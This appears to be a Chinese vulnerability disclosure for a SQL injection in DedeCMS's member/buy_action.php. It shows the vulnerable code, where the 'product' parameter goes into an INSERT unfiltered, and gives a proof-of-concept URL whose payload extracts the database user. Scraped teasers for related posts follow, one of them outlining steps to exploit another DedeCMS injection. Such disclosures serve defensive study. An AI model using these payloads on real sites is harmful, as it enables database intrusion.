詳細說明:
member/buy_action.php
require_once(dirname(__file__)."/config.php");
checkrank(0,0);
$menutype = 'mydede';
$menutype_son = 'op';
require_once dedeinc.'/dedetemplate.class.php';
$product = isset($product) ? trim($product) : '';
$mid = $cfg_ml->m_id;
$ptype = '';
$pname = '';
$price = '';
$mtime = time();
省略xx行
if(empty($product))
省略***行
=if(!isset($paytype))
{
$inquery = "insert into member_operation(`buyid` , `pname` , `product` , `money` , `mtime` , `pid` , `mid` , `sta` ,`oldinfo`)
values ('$buyid', '$pname', '$product' , '$price' , '$mtime' , '$pid' , '$mid' , '0' , '$ptype');//product沒有過濾 ";
echo $inquery."
" ;
漏洞證明:
測試方法
註冊使用者之後驗證郵箱完了之後 開啟
127.0.0.1/dedecms/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
然後在就可以檢視到返回資訊了
dedecms會員註冊注入漏洞
一 首先訪問 data admin ver.txt 頁面獲取系統最後公升級時間,判斷是否是dede的cms 以及看看是否和這個漏洞相對應 二 然後訪問 member ajax membergroup.php?action post membergroup 1 頁面 看是否可注入 三 爆使用者 mem...
dedecms織夢會員中心分類管理無法修改分類名
織夢會員中心分類管理無法修改分類名 member mtypes.php 檔案中,修改方法如下.應該是 mtypename變數沒定義 1 2 foreach mtypename as id name 這句替換為下面這句3 4 foreach post mtypename as id name 另外,m...
帝國cms 會員中心2 0
if defined inempirecms public diyr pagetitle 會員中心 url 首頁 會員中心 require ecms path.e template incfile header.php 歡迎你 if tmgetgroupid 3 elseif tmgetgroupi...